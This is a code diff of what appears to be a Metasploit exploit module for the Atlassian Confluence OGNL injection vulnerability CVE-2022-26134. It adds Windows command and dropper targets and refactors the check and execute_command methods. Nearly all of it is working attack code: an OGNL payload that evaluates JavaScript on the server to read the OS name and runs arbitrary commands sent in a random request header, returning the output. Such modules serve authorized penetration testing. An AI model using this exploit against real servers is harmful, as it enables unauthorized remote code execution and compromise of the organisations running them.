@@ -27,15 +27,15 @@ def initialize(info = {})
2727 'Spencer McIntyre'
2828 ] ,
2929 'References' => [
30- [ 'CVE' , '2021-26084 ' ] ,
30+ [ 'CVE' , '2022-26134 ' ] ,
3131 [ 'URL' , 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro' ] ,
3232 [ 'URL' , 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py' ] ,
3333 [ 'URL' , 'https://github.com/jbaines-r7/through_the_wire' ] ,
3434 [ 'URL' , 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis' ]
3535 ] ,
3636 'DisclosureDate' => '2022-06-02' ,
3737 'License' => MSF_LICENSE ,
38- 'Platform' => [ 'unix' , 'linux' ] ,
38+ 'Platform' => [ 'unix' , 'linux' , 'win' ] ,
3939 'Arch' => [ ARCH_CMD , ARCH_X86 , ARCH_X64 ] ,
4040 'Privileged' => false ,
4141 'Targets' => [
@@ -54,6 +54,22 @@ def initialize(info = {})
5454 'Arch' => [ ARCH_X86 , ARCH_X64 ] ,
5555 'Type' => :dropper
5656 }
57+ ] ,
58+ [
59+ 'Windows Command' ,
60+ {
61+ 'Platform' => 'win' ,
62+ 'Arch' => ARCH_CMD ,
63+ 'Type' => :cmd
64+ }
65+ ] ,
66+ [
67+ 'Windows Dropper' ,
68+ {
69+ 'Platform' => 'win' ,
70+ 'Arch' => [ ARCH_X86 , ARCH_X64 ] ,
71+ 'Type' => :dropper
72+ }
5773 ]
5874 ] ,
5975 'DefaultTarget' => 0 ,
@@ -79,14 +95,29 @@ def check
7995
8096 vprint_status ( "Detected Confluence version: #{ version } )
8197 header = "X-#{ Rex ::Text . rand_text_alphanumeric ( 10 ..15 ) }
82- res = inject_ognl ( '' , header : header ) # empty command works for testing, the header will be set
98+ ognl = <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
99+ ${
100+ Class.forName("com.opensymphony.webwork.ServletActionContext")
101+ .getMethod("getResponse",null)
102+ .invoke(null,null)
103+ .setHeader(
104+ "#{ header }
105+ Class.forName("javax.script.ScriptEngineManager")
106+ .newInstance()
107+ .getEngineByName("js")
108+ .eval("java.lang.System.getProperty('os.name')")
109+ )
110+ }
111+ OGNL
112+ res = inject_ognl ( ognl )
83113
84114 return CheckCode ::Unknown unless res
85115
86116 unless res && res . headers . include? ( header )
87117 return CheckCode ::Safe ( 'Failed to test OGNL injection.' )
88118 end
89119
120+ vprint_status ( "Detected target platform: #{ res . headers [ header ] } )
90121 CheckCode ::Vulnerable ( 'Successfully tested OGNL injection.' )
91122 end
92123
@@ -119,26 +150,7 @@ def exploit
119150
120151 def execute_command ( cmd , _opts = { } )
121152 header = "X-#{ Rex ::Text . rand_text_alphanumeric ( 10 ..15 ) }
122- res = inject_ognl ( cmd , header : header )
123-
124- unless res && res . headers . include? ( header )
125- fail_with ( Failure ::PayloadFailed , "Failed to execute command: #{ cmd } )
126- end
127-
128- vprint_good ( "Successfully executed command: #{ cmd } )
129- res . headers [ header ]
130- end
131-
132- def inject_ognl ( cmd , header :)
133- send_request_cgi (
134- 'method' => 'POST' ,
135- 'uri' => normalize_uri ( target_uri . path , Rex ::Text . uri_encode ( ognl_payload ( cmd , header : header ) ) , 'dashboard.action' ) ,
136- 'headers' => { header => cmd }
137- )
138- end
139-
140- def ognl_payload ( _cmd , header :)
141- <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
153+ ognl = <<~OGNL . gsub ( /^\s +/ , '' ) . tr ( "\n " , '' )
142154 ${
143155 Class.forName("com.opensymphony.webwork.ServletActionContext")
144156 .getMethod("getResponse",null)
@@ -154,5 +166,20 @@ def ognl_payload(_cmd, header:)
154166 )
155167 }
156168 OGNL
169+ res = inject_ognl ( ognl , 'headers' => { header => cmd } )
170+
171+ unless res && res . headers . include? ( header )
172+ fail_with ( Failure ::PayloadFailed , "Failed to execute command: #{ cmd } )
173+ end
174+
175+ vprint_good ( "Successfully executed command: #{ cmd } )
176+ res . headers [ header ]
177+ end
178+
179+ def inject_ognl ( ognl , opts = { } )
180+ send_request_cgi ( {
181+ 'method' => 'POST' ,
182+ 'uri' => normalize_uri ( target_uri . path , Rex ::Text . uri_encode ( ognl ) , 'dashboard.action' )
183+ } . merge ( opts ) )
157184 end
158185end
0 commit comments